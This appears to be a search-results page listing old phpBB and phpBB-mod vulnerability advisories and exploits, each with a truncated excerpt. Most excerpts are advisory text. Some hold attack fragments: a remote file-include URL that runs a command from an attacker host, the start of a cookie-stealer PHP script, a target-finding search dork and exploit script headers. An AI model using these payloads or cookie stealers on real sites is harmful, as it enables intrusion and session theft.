2180 matches found
PhpBB BBRSS.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/18432/info The bbrss plugin for PhpBB is prone to a remote file-include vulnerability. An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of...
PHPBB-Auction Module 1.0/1.2 Auction_Offer.PHP SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13284/info phpbb-auction module is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitati...
phpBB User Viewed Posts Tracker <= 1.0 File Include Vulnerability
No description provided by source. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= phpBB User Viewed Posts Tracker Version = 1.0 phpbbrootpath File Include Vulnerability...
phpBB Knowledge Base 2.0.2 Mod KB_constants.PHP Remote File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17763/info Knowledge Base Mod for phpbb is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploit this issue to...
phpBB 3 (Mod Tag Board <= 4) Remote Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl --------------------------------------------------------------- phpBB 3 Mod Tag Board = 4 Remote Blind SQL Injection Exploit by athos - stakerathotmaildotit http://bx67212.netsons.org/forum/viewforum.php?f=3...
TopList <= 1.3.8 (phpBB Hack) Remote File Inclusion Vulnerability
No description provided by source. Title: TopList Hack for PHPBB = 1.3.8 Remote File Inclusion URL: http://www.phpbb2hacks.de/toplist-df148.html Dork: inurl:toplist.php powered by phpbb Credits: Oo Exploit: /toplist.php?f=toplisttop10&phpbbrootpath=http://yourhost/cmd.gif?cmd=ls milw0rm.com...
PHPBB 2.0.20 Unauthorized HTTP Proxy Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/17965/info phpBB is prone to a vulnerability that could permit the application to become an unauthorized HTTP proxy. An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy...
phpBB Prillian French Mod <= 0.8.0 - Remote File Include Exploit
No description provided by source. !/usr/bin/perl PhpBB Prillian French Class: Remote File Include Vulnerability Patch: unavailable Date: 2006/10/12 Remote: Yes Type: high...
Advanced GuestBook <= 2.4.0 (phpBB) Remote File Inclusion Exploit
No description provided by source...
PHPBB 2.0.x Authentication Bypass Vulnerability (1)
No description provided by source...
PHPBB 2.0.x Viewtopic.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13345/info phpBB is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script...
EQdkp <= 1.3.1 (Referer Spoof) Remote Database Backup Vulnerability
No description provided by source. Title: EQdkp = 1.3.1 Referer Spoof to access to SQL Database URL: http://www.eqdkp.com Hook: Powered by EQdkp Author: Eight10 Contact: [email protected] --------------------------------------------------------------------------------------------------------...
phpBB PlusXL <= 2.0_272 (constants.php) Remote File Include Exploit
No description provided by source. !/usr/bin/env python coding: utf-8 import re from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class phpBBPlusXLRemoteFileIncludePOCBase: vulID = '64099' version = '1' vulDate = '2006-10-18' author = ' '...
phpBB XS <= 0.58 (functions.php) Remote File Include Vulnerability
No description provided by source. Author: AzzCoder Vendor: http://www.phpbbxs.eu/ Vulnerable File: includes/functions.php Vulnerable Code: //The phpbbrootpath isn't initialize includeonce $phpbbrootpath . './includes/functionscategorieshierarchy.' . $phpEx ; Method To Use:...
phpBB Chart Mod 1.1 charts.php id Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/17952/info Chart Mod is prone to multiple input-validation vulnerabilities. The issues include cross-site scripting and SQL-injection vulnerabilities. These issues are due to a failure in the application to properly...
phpBB <= 2.0.16 XSS Remote Cookie Disclosure Exploit (cookie grabber)
No description provided by source. // Original Author: 'Sjaak Rake' Ref: http://www.hackthissite.org/articles/read/175/ ?php $cookie = $GET'c'; $ip = getenv 'REMOTEADDR'; $date=datej F, Y, g:i a; $referer=getenv 'HTTPREFERER'; $fp = fopen'cookies.txt', 'a'; fwrite$fp, 'Cookie: '.$cookie.'br IP: '...
phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
No description provided by source. to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103 Make sure you change www.milw0rm.com to your domain. thnx. /str0ke Author: threesixthousan / As long as html is ON in the latest version of phpBB forums, several XSS attack vector...
Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability
No description provided by source. Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz . Abdullah...
Phpbb Tweaked <= 3 (phpbb_root_path) Remote Inclusion Vulnerability
No description provided by source. ----------------------------------------------- Phpbb Tweaked phpbbrootpath Remote File Include Exploit ----------------------------------------------- Author: xoron xoron.biz - xoron.info ----------------------------------------------- Code: includeonce...
phpBB PJIRC Module 0.5 - 'irc.php' Local File Include Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/28446/info The PJIRC module for phpBB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability using directory-traversal strings ...